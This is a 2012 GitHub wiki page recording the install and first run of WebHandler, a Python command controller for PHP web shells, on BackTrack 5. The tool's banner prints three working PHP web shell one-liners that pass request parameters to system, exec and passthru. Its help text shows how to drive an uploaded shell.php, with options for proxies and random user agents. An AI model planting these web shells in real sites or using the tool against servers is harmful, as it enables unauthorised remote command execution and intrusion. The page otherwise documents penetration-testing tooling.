Skip to content
g0tmi1k edited this page Jul 16, 2012 · 3 revisions

Backtrack 5

Below is the commands and output from installing WebHander on Backtrack

Commands:

Output

root@bt:~# git clone https://github.com/lnxg33k/webhandler.git
Initialized empty Git repository in /root/webhandler/.git/
remote: Counting objects: 921, done.
remote: Compressing objects: 100% (440/440), done.
remote: Total 921 (delta 467), reused 897 (delta 444)
Receiving objects: 100% (921/921), 496.80 KiB | 375 KiB/s, done.
Resolving deltas: 100% (467/467), done.
root@bt:~# cd webhandler/
root@bt:~/webhandler# ls -alh
total 28K
drwxr-xr-x  5 root root 4.0K 2012-07-13 22:13 .
drwx------ 41 root root 4.0K 2012-07-13 22:13 ..
drwxr-xr-x  4 root root 4.0K 2012-07-13 22:13 core
drwxr-xr-x  2 root root 4.0K 2012-07-13 22:13 dev
drwxr-xr-x  8 root root 4.0K 2012-07-13 22:13 .git
-rw-r--r--  1 root root 1.7K 2012-07-13 22:13 README.md
-rwxr-xr-x  1 root root 1.4K 2012-07-13 22:13 webhandler.py
root@bt:~/webhandler# easy_install argparse
Searching for argparse
Reading http://pypi.python.org/simple/argparse/
Reading http://code.google.com/p/argparse/
Best match: argparse 1.2.1
Downloading http://argparse.googlecode.com/files/argparse-1.2.1.tar.gz
Processing argparse-1.2.1.tar.gz
Running argparse-1.2.1/setup.py -q bdist_egg --dist-dir /tmp/easy_install-ahaGJx/argparse-1.2.1/egg-dist-tmp-ta0SmE
warning: no previously-included files matching '*.pyc' found anywhere in distribution
warning: no previously-included files matching '*.pyo' found anywhere in distribution
warning: no previously-included files matching '*.orig' found anywhere in distribution
warning: no previously-included files matching '*.rej' found anywhere in distribution
no previously-included directories found matching 'doc/_build'
no previously-included directories found matching 'env24'
no previously-included directories found matching 'env25'
no previously-included directories found matching 'env26'
no previously-included directories found matching 'env27'
zip_safe flag not set; analyzing archive contents...
Adding argparse 1.2.1 to easy-install.pth file

Installed /usr/local/lib/python2.6/dist-packages/argparse-1.2.1-py2.6.egg
Processing dependencies for argparse
Finished processing dependencies for argparse
root@bt:~/webhandler# python webhandler.py 

-- Command controler for PHP system functions. --
--   Which works for POST and GET requests:    --

1-   <?php system($_GET['parameter']); ?>
2-   <?php exec($_POST['parameter']); ?>
3-   <?php passthru($_REQUEST['parameter']); ?>

Run: webhandler.py -h for help
root@bt:~/webhandler# python webhandler.py -h
usage: webhandler.py -h

Positional arguments:
  -u , --url           		Full URL for the uploaded PHP code

Optional arguments:
  -h, --help           		Print this help message then exit
  -c, --turbo          		Increase the execution speed if the out-put doesn't contain garbage
  -m , --method        		The method used in the uploaded PHP code (e.g. post)
  -p , --parameter     		Parameter that used in the shell (e.g. cmd)
  -x , --proxy         		Proxy (e.g. 'http://127.0.0.1:8080')
  -g , --user-agent    		user-agent (e.g. 'Mozilla/5.0')
  -rg, --random-agent  		WebHandler will use some random user-agent
  -up, --update        		Update webhandler from git cli  "GitHub repo"

Examples:
    python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
root@bt:~/webhandler#
Clone this wiki locally